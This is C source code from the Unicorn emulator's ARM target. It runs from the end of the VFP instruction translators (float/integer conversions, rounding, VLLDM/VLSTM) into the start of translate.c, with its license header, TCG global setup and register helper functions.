fpst); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, vd); return true; } static bool trans_VCVT_f16_f32(DisasContext *s, arg_VCVT_f16_f32 *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 ahp_mode; TCGv_i32 tmp; if (!dc_isar_feature(aa32_fp16_spconv, s)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); ahp_mode = get_ahp_flag(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tmp, fpst, ahp_mode); tcg_gen_st16_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, vfp_f16_offset(a->vd, a->t)); tcg_temp_free_i32(tcg_ctx, ahp_mode); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VCVT_f16_f64(DisasContext *s, arg_VCVT_f16_f64 *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 ahp_mode; TCGv_i32 tmp; TCGv_i64 vm; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_fp16_dpconv, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. 
*/ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); ahp_mode = get_ahp_flag(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); vm = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vm, a->vm); gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tmp, vm, fpst, ahp_mode); tcg_temp_free_i64(tcg_ctx, vm); tcg_gen_st16_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, vfp_f16_offset(a->vd, a->t)); tcg_temp_free_i32(tcg_ctx, ahp_mode); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VRINTR_sp(DisasContext *s, arg_VRINTR_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 tmp; if (!dc_isar_feature(aa32_vrint, s)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_rints(tcg_ctx, tmp, tmp, fpst); neon_store_reg32(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VRINTR_dp(DisasContext *s, arg_VRINTR_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i64 tmp; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_vrint, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vm) & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_rintd(tcg_ctx, tmp, tmp, fpst); neon_store_reg64(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tmp); return true; } static bool trans_VRINTZ_sp(DisasContext *s, arg_VRINTZ_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 tmp; TCGv_i32 tcg_rmode; if (!dc_isar_feature(aa32_vrint, s)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_rmode = tcg_const_i32(tcg_ctx, float_round_to_zero); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_helper_rints(tcg_ctx, tmp, tmp, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); neon_store_reg32(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VRINTZ_dp(DisasContext *s, arg_VRINTZ_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i64 tmp; TCGv_i32 tcg_rmode; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_vrint, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. 
*/ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vm) & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_rmode = tcg_const_i32(tcg_ctx, float_round_to_zero); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_helper_rintd(tcg_ctx, tmp, tmp, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); neon_store_reg64(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, tcg_rmode); return true; } static bool trans_VRINTX_sp(DisasContext *s, arg_VRINTX_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 tmp; if (!dc_isar_feature(aa32_vrint, s)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_rints_exact(tcg_ctx, tmp, tmp, fpst); neon_store_reg32(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VRINTX_dp(DisasContext *s, arg_VRINTX_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i64 tmp; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_vrint, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vm) & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_rintd_exact(tcg_ctx, tmp, tmp, fpst); neon_store_reg64(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tmp); return true; } static bool trans_VCVT_sp(DisasContext *s, arg_VCVT_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 vd; TCGv_i32 vm; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vm = tcg_temp_new_i32(tcg_ctx); vd = tcg_temp_new_i64(tcg_ctx); neon_load_reg32(tcg_ctx, vm, a->vm); gen_helper_vfp_fcvtds(tcg_ctx, vd, vm, tcg_ctx->cpu_env); neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_i64(tcg_ctx, vd); return true; } static bool trans_VCVT_dp(DisasContext *s, arg_VCVT_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 vm; TCGv_i32 vd; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. 
*/ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vd = tcg_temp_new_i32(tcg_ctx); vm = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vm, a->vm); gen_helper_vfp_fcvtsd(tcg_ctx, vd, vm, tcg_ctx->cpu_env); neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vd); tcg_temp_free_i64(tcg_ctx, vm); return true; } static bool trans_VCVT_int_sp(DisasContext *s, arg_VCVT_int_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vm; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!vfp_access_check(s)) { return true; } vm = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vm, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); if (a->s) { /* i32 -> f32 */ gen_helper_vfp_sitos(tcg_ctx, vm, vm, fpst); } else { /* u32 -> f32 */ gen_helper_vfp_uitos(tcg_ctx, vm, vm, fpst); } neon_store_reg32(tcg_ctx, vm, a->vd); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT_int_dp(DisasContext *s, arg_VCVT_int_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vm; TCGv_i64 vd; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vm = tcg_temp_new_i32(tcg_ctx); vd = tcg_temp_new_i64(tcg_ctx); neon_load_reg32(tcg_ctx, vm, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); if (a->s) { /* i32 -> f64 */ gen_helper_vfp_sitod(tcg_ctx, vd, vm, fpst); } else { /* u32 -> f64 */ gen_helper_vfp_uitod(tcg_ctx, vd, vm, fpst); } neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_i64(tcg_ctx, vd); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VJCVT(DisasContext *s, arg_VJCVT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vd; TCGv_i64 vm; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_jscvt, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vm = tcg_temp_new_i64(tcg_ctx); vd = tcg_temp_new_i32(tcg_ctx); neon_load_reg64(tcg_ctx, vm, a->vm); gen_helper_vjcvt(tcg_ctx, vd, vm, tcg_ctx->cpu_env); neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_i64(tcg_ctx, vm); tcg_temp_free_i32(tcg_ctx, vd); return true; } static bool trans_VCVT_fix_sp(DisasContext *s, arg_VCVT_fix_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vd, shift; TCGv_ptr fpst; int frac_bits; if (!dc_isar_feature(aa32_fpsp_v3, s)) { return false; } if (!vfp_access_check(s)) { return true; } frac_bits = (a->opc & 1) ? 
(32 - a->imm) : (16 - a->imm); vd = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vd, a->vd); fpst = get_fpstatus_ptr(tcg_ctx, false); shift = tcg_const_i32(tcg_ctx, frac_bits); /* Switch on op:U:sx bits */ switch (a->opc) { case 0: gen_helper_vfp_shtos(tcg_ctx, vd, vd, shift, fpst); break; case 1: gen_helper_vfp_sltos(tcg_ctx, vd, vd, shift, fpst); break; case 2: gen_helper_vfp_uhtos(tcg_ctx, vd, vd, shift, fpst); break; case 3: gen_helper_vfp_ultos(tcg_ctx, vd, vd, shift, fpst); break; case 4: gen_helper_vfp_toshs_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 5: gen_helper_vfp_tosls_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 6: gen_helper_vfp_touhs_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 7: gen_helper_vfp_touls_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; default: g_assert_not_reached(); } neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vd); tcg_temp_free_i32(tcg_ctx, shift); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT_fix_dp(DisasContext *s, arg_VCVT_fix_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 vd; TCGv_i32 shift; TCGv_ptr fpst; int frac_bits; if (!dc_isar_feature(aa32_fpdp_v3, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } frac_bits = (a->opc & 1) ? (32 - a->imm) : (16 - a->imm); vd = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vd, a->vd); fpst = get_fpstatus_ptr(tcg_ctx, false); shift = tcg_const_i32(tcg_ctx, frac_bits); /* Switch on op:U:sx bits */ switch (a->opc) { case 0: gen_helper_vfp_shtod(tcg_ctx, vd, vd, shift, fpst); break; case 1: gen_helper_vfp_sltod(tcg_ctx, vd, vd, shift, fpst); break; case 2: gen_helper_vfp_uhtod(tcg_ctx, vd, vd, shift, fpst); break; case 3: gen_helper_vfp_ultod(tcg_ctx, vd, vd, shift, fpst); break; case 4: gen_helper_vfp_toshd_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 5: gen_helper_vfp_tosld_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 6: gen_helper_vfp_touhd_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 7: gen_helper_vfp_tould_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; default: g_assert_not_reached(); } neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_i64(tcg_ctx, vd); tcg_temp_free_i32(tcg_ctx, shift); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT_sp_int(DisasContext *s, arg_VCVT_sp_int *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vm; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); vm = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vm, a->vm); if (a->s) { if (a->rz) { gen_helper_vfp_tosizs(tcg_ctx, vm, vm, fpst); } else { gen_helper_vfp_tosis(tcg_ctx, vm, vm, fpst); } } else { if (a->rz) { gen_helper_vfp_touizs(tcg_ctx, vm, vm, fpst); } else { gen_helper_vfp_touis(tcg_ctx, vm, vm, fpst); } } neon_store_reg32(tcg_ctx, vm, a->vd); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT_dp_int(DisasContext *s, arg_VCVT_dp_int *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vd; TCGv_i64 vm; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. 
*/ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); vm = tcg_temp_new_i64(tcg_ctx); vd = tcg_temp_new_i32(tcg_ctx); neon_load_reg64(tcg_ctx, vm, a->vm); if (a->s) { if (a->rz) { gen_helper_vfp_tosizd(tcg_ctx, vd, vm, fpst); } else { gen_helper_vfp_tosid(tcg_ctx, vd, vm, fpst); } } else { if (a->rz) { gen_helper_vfp_touizd(tcg_ctx, vd, vm, fpst); } else { gen_helper_vfp_touid(tcg_ctx, vd, vm, fpst); } } neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vd); tcg_temp_free_i64(tcg_ctx, vm); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } /* * Decoding of VLLDM and VLSTM is nonstandard because: * * if there is no FPU then these insns must NOP in * Secure state and UNDEF in Nonsecure state * * if there is an FPU then these insns do not have * the usual behaviour that vfp_access_check() provides of * being controlled by CPACR/NSACR enable bits or the * lazy-stacking logic. */ static bool trans_VLLDM_VLSTM(DisasContext *s, arg_VLLDM_VLSTM *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 fptr; if (!arm_dc_feature(s, ARM_FEATURE_M) || !arm_dc_feature(s, ARM_FEATURE_V8)) { return false; } /* If not secure, UNDEF. */ if (!s->v8m_secure) { return false; } /* If no fpu, NOP. */ if (!dc_isar_feature(aa32_vfp, s)) { return true; } fptr = load_reg(s, a->rn); if (a->l) { gen_helper_v7m_vlldm(tcg_ctx, tcg_ctx->cpu_env, fptr); } else { gen_helper_v7m_vlstm(tcg_ctx, tcg_ctx->cpu_env, fptr); } tcg_temp_free_i32(tcg_ctx, fptr); /* End the TB, because we have updated FP control bits */ s->base.is_jmp = DISAS_UPDATE; return true; }
unicorn-2.1.1/qemu/target/arm/translate.c
/* * ARM translation * * Copyright (c) 2003 Fabrice Bellard * Copyright (c) 2005-2007 CodeSourcery * Copyright (c) 2007 OpenedHand, Ltd. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "qemu/log.h" #include "qemu/bitops.h" #include "arm_ldst.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #define ENABLE_ARCH_4T arm_dc_feature(s, ARM_FEATURE_V4T) #define ENABLE_ARCH_5 arm_dc_feature(s, ARM_FEATURE_V5) /* currently all emulated v5 cores are also v5TE, so don't bother */ #define ENABLE_ARCH_5TE arm_dc_feature(s, ARM_FEATURE_V5) #define ENABLE_ARCH_5J dc_isar_feature(aa32_jazelle, s) #define ENABLE_ARCH_6 arm_dc_feature(s, ARM_FEATURE_V6) #define ENABLE_ARCH_6K arm_dc_feature(s, ARM_FEATURE_V6K) #define ENABLE_ARCH_6T2 arm_dc_feature(s, ARM_FEATURE_THUMB2) #define ENABLE_ARCH_7 arm_dc_feature(s, ARM_FEATURE_V7) #define ENABLE_ARCH_8 arm_dc_feature(s, ARM_FEATURE_V8) #define ARCH(x) do { if (!ENABLE_ARCH_##x) goto illegal_op; } while(0) #include "translate.h" #define IS_USER(s) (s->user) #include "exec/gen-icount.h" static const char * const regnames[] = { "r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "pc" }; /* Function prototypes for gen_ functions calling Neon helpers. */ typedef void NeonGenThreeOpEnvFn(TCGContext *, TCGv_i32, TCGv_env, TCGv_i32, TCGv_i32, TCGv_i32); /* Function prototypes for gen_ functions for fix point conversions */ typedef void VFPGenFixPointFn(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_ptr); /* initialize TCG globals. */ void arm_translate_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; int i; for (i = 0; i < 16; i++) { tcg_ctx->cpu_R[i] = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, regs[i]), regnames[i]); } tcg_ctx->cpu_CF = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, CF), "CF"); tcg_ctx->cpu_NF = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, NF), "NF"); tcg_ctx->cpu_VF = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, VF), "VF"); tcg_ctx->cpu_ZF = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, ZF), "ZF"); tcg_ctx->cpu_exclusive_addr = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, exclusive_addr), "exclusive_addr"); tcg_ctx->cpu_exclusive_val = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, exclusive_val), "exclusive_val"); a64_translate_init(uc); } /* Flags for the disas_set_da_iss info argument: * lower bits hold the Rt register number, higher bits are flags. */ typedef enum ISSInfo { ISSNone = 0, ISSRegMask = 0x1f, ISSInvalid = (1 << 5), ISSIsAcqRel = (1 << 6), ISSIsWrite = (1 << 7), ISSIs16Bit = (1 << 8), } ISSInfo; /* Save the syndrome information for a Data Abort */ static void disas_set_da_iss(DisasContext *s, MemOp memop, ISSInfo issinfo) { uint32_t syn; int sas = memop & MO_SIZE; bool sse = memop & MO_SIGN; bool is_acqrel = issinfo & ISSIsAcqRel; bool is_write = issinfo & ISSIsWrite; bool is_16bit = issinfo & ISSIs16Bit; int srt = issinfo & ISSRegMask; if (issinfo & ISSInvalid) { /* Some callsites want to conditionally provide ISS info, * eg "only if this was not a writeback" */ return; } if (srt == 15) { /* For AArch32, insns where the src/dest is R15 never generate * ISS information. Catching that here saves checking at all * the call sites. 
*/ return; } syn = syn_data_abort_with_iss(0, sas, sse, srt, 0, is_acqrel, 0, 0, 0, is_write, 0, is_16bit); disas_set_insn_syndrome(s, syn); } static inline int get_a32_user_mem_index(DisasContext *s) { /* Return the core mmu_idx to use for A32/T32 "unprivileged load/store" * insns: * if PL2, UNPREDICTABLE (we choose to implement as if PL0) * otherwise, access as if at PL0. */ switch (s->mmu_idx) { case ARMMMUIdx_E2: /* this one is UNPREDICTABLE */ case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: return arm_to_core_mmu_idx(ARMMMUIdx_E10_0); case ARMMMUIdx_SE3: case ARMMMUIdx_SE10_0: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: return arm_to_core_mmu_idx(ARMMMUIdx_SE10_0); case ARMMMUIdx_MUser: case ARMMMUIdx_MPriv: return arm_to_core_mmu_idx(ARMMMUIdx_MUser); case ARMMMUIdx_MUserNegPri: case ARMMMUIdx_MPrivNegPri: return arm_to_core_mmu_idx(ARMMMUIdx_MUserNegPri); case ARMMMUIdx_MSUser: case ARMMMUIdx_MSPriv: return arm_to_core_mmu_idx(ARMMMUIdx_MSUser); case ARMMMUIdx_MSUserNegPri: case ARMMMUIdx_MSPrivNegPri: return arm_to_core_mmu_idx(ARMMMUIdx_MSUserNegPri); default: g_assert_not_reached(); /* never reach here */ return 0; } } static inline TCGv_i32 load_cpu_offset(TCGContext *tcg_ctx, int offset) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offset); return tmp; } #define load_cpu_field(tcg_ctx, name) load_cpu_offset(tcg_ctx, offsetof(CPUARMState, name)) static inline void store_cpu_offset(TCGContext *tcg_ctx, TCGv_i32 var, int offset) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); tcg_temp_free_i32(tcg_ctx, var); } #define store_cpu_field(tcg_ctx, var, name) \ store_cpu_offset(tcg_ctx, var, offsetof(CPUARMState, name)) /* The architectural value of PC. */ static uint32_t read_pc(DisasContext *s) { return s->pc_curr + (s->thumb ? 4 : 8); } /* Set a variable to the value of a CPU register. */ static void load_reg_var(DisasContext *s, TCGv_i32 var, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (reg == 15) { tcg_gen_movi_i32(tcg_ctx, var, read_pc(s)); } else { tcg_gen_mov_i32(tcg_ctx, var, tcg_ctx->cpu_R[reg]); } } /* Create a new temporary and set it to the value of a CPU register. */ static inline TCGv_i32 load_reg(DisasContext *s, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); load_reg_var(s, tmp, reg); return tmp; } /* * Create a new temp, REG + OFS, except PC is ALIGN(PC, 4). * This is used for load/store for which use of PC implies (literal), * or ADD that implies ADR. */ static TCGv_i32 add_reg_for_lit(DisasContext *s, int reg, int ofs) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); if (reg == 15) { tcg_gen_movi_i32(tcg_ctx, tmp, (read_pc(s) & ~3) + ofs); } else { tcg_gen_addi_i32(tcg_ctx, tmp, tcg_ctx->cpu_R[reg], ofs); } return tmp; } /* Set a CPU register. The source must be a temporary and will be marked as dead. */ static void store_reg(DisasContext *s, int reg, TCGv_i32 var) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (reg == 15) { /* In Thumb mode, we must ignore bit 0. * In ARM mode, for ARMv4 and ARMv5, it is UNPREDICTABLE if bits [1:0] * are not 0b00, but for ARMv6 and above, we must ignore bits [1:0]. * We choose to ignore [1:0] in ARM mode for all architecture versions. */ tcg_gen_andi_i32(tcg_ctx, var, var, s->thumb ?
~1 : ~3); s->base.is_jmp = DISAS_JUMP; } tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_R[reg], var); tcg_temp_free_i32(tcg_ctx, var); } /* * Variant of store_reg which applies v8M stack-limit checks before updating * SP. If the check fails this will result in an exception being taken. * We disable the stack checks for CONFIG_USER_ONLY because we have * no idea what the stack limits should be in that case. * If stack checking is not being done this just acts like store_reg(). */ static void store_sp_checked(DisasContext *s, TCGv_i32 var) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->v8m_stackcheck) { gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, var); } store_reg(s, 13, var); } /* Value extensions. */ #define gen_uxtb(var) tcg_gen_ext8u_i32(tcg_ctx, var, var) #define gen_uxth(var) tcg_gen_ext16u_i32(tcg_ctx, var, var) #define gen_sxtb(var) tcg_gen_ext8s_i32(tcg_ctx, var, var) #define gen_sxth(var) tcg_gen_ext16s_i32(tcg_ctx, var, var) #define gen_sxtb16(var) gen_helper_sxtb16(tcg_ctx, var, var) #define gen_uxtb16(var) gen_helper_uxtb16(tcg_ctx, var, var) static inline void gen_set_cpsr(TCGContext *tcg_ctx, TCGv_i32 var, uint32_t mask) { TCGv_i32 tmp_mask = tcg_const_i32(tcg_ctx, mask); gen_helper_cpsr_write(tcg_ctx, tcg_ctx->cpu_env, var, tmp_mask); tcg_temp_free_i32(tcg_ctx, tmp_mask); } /* Set NZCV flags from the high 4 bits of var. */ #define gen_set_nzcv(var) gen_set_cpsr(tcg_ctx, var, CPSR_NZCV) static void gen_exception_internal(TCGContext *tcg_ctx, int excp) { TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); assert(excp_is_internal(excp)); gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tcg_excp); tcg_temp_free_i32(tcg_ctx, tcg_excp); } static void gen_step_complete_exception(DisasContext *s) { /* We just completed step of an insn. Move from Active-not-pending * to Active-pending, and then also take the swstep exception. * This corresponds to making the (IMPDEF) choice to prioritize * swstep exceptions over asynchronous exceptions taken to an exception * level where debug is disabled. This choice has the advantage that * we do not need to maintain internal state corresponding to the * ISV/EX syndrome bits between completion of the step and generation * of the exception, and our syndrome information is always correct. */ gen_ss_advance(s); gen_swstep_exception(s, 1, s->is_ldex); s->base.is_jmp = DISAS_NORETURN; } static void gen_singlestep_exception(DisasContext *s) { /* Generate the right kind of exception for singlestep, which is * either the architectural singlestep or EXCP_DEBUG for QEMU's * gdb singlestepping. */ TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->ss_active) { gen_step_complete_exception(s); } else { gen_exception_internal(tcg_ctx, EXCP_DEBUG); } } static inline bool is_singlestepping(DisasContext *s) { /* Return true if we are singlestepping either because of * architectural singlestep or QEMU gdbstub singlestep. This does * not include the command line '-singlestep' mode which is rather * misnamed as it only means "one instruction per TB" and doesn't * affect the code we generate. 
